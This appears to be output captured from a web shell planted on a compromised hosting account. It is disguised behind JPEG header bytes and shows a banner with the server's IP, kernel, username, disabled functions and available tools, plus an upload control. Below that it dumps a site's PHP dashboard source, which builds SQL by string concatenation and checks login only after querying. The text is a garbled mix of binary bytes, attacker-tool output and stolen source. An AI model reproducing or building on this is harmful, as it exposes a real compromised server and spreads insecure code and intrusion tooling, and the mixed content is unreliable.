����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.145.44.46 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/voltify.malawisounds.com/ |
Upload File : |
<?php include './php/connect.php'; include './php/core.php'; //selecting user data $user = $_SESSION['uid']; $query1 = "SELECT `firstname`,`surname`,`email`,`mobile`,`password`,`type` FROM `users` WHERE `uid`='$user'"; if ($run1 = mysqli_query($conn, $query1)) { list($firstname, $surname, $email, $mobile, $password, $user_type) = mysqli_fetch_array($run1); } else { die(mysqli_error($conn)); } if (!loggedin()) { header('location:login.php'); } ?> <!doctype html> <html class="no-js" lang=""> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- favicon ============================================ --> <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico"> <!-- Google Fonts ============================================ --> <link href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,700,900" rel="stylesheet"> <!-- Bootstrap CSS ============================================ --> <link rel="stylesheet" href="css/bootstrap.min.css"> <!-- font awesome CSS ============================================ --> <link rel="stylesheet" href="css/font-awesome.min.css"> <!-- owl.carousel CSS ============================================ --> <link rel="stylesheet" href="css/owl.carousel.css"> <link rel="stylesheet" href="css/owl.theme.css"> <link rel="stylesheet" href="css/owl.transitions.css"> <!-- meanmenu CSS ============================================ --> <link rel="stylesheet" href="css/meanmenu/meanmenu.min.css"> <!-- animate CSS ============================================ --> <link rel="stylesheet" href="css/animate.css"> <!-- summernote CSS ============================================ --> <link rel="stylesheet" href="css/summernote/summernote.css"> <!-- Range Slider CSS ============================================ --> <link rel="stylesheet" href="css/themesaller-forms.css"> <!-- normalize CSS ============================================ --> <link rel="stylesheet" href="css/normalize.css"> <!-- mCustomScrollbar CSS ============================================ --> <link rel="stylesheet" href="css/scrollbar/jquery.mCustomScrollbar.min.css"> <!-- Notika icon CSS ============================================ --> <link rel="stylesheet" href="css/notika-custom-icon.css"> <!-- bootstrap select CSS ============================================ --> <link rel="stylesheet" href="css/bootstrap-select/bootstrap-select.css"> <!-- datapicker CSS ============================================ --> <link rel="stylesheet" href="css/datapicker/datepicker3.css"> <!-- Color Picker CSS ============================================ --> <link rel="stylesheet" href="css/color-picker/farbtastic.css"> <!-- main CSS ============================================ --> <link rel="stylesheet" href="css/chosen/chosen.css"> <!-- notification CSS ============================================ --> <link rel="stylesheet" href="css/notification/notification.css"> <!-- dropzone CSS ============================================ --> <link rel="stylesheet" href="css/dropzone/dropzone.css"> <!-- wave CSS ============================================ --> <link rel="stylesheet" href="css/wave/waves.min.css"> <!-- Data Table JS ============================================ --> <link rel="stylesheet" href="css/jquery.dataTables.min.css"> <!-- main CSS ============================================ --> <link rel="stylesheet" href="css/main.css"> <!-- style CSS ============================================ --> <link rel="stylesheet" href="style.css"> <!-- responsive CSS ============================================ --> <link rel="stylesheet" href="css/responsive.css"> <!-- modernizr JS ============================================ --> <script src="js/vendor/modernizr-2.8.3.min.js"></script> <script src="./js/sweetalert.min.js"></script> </head>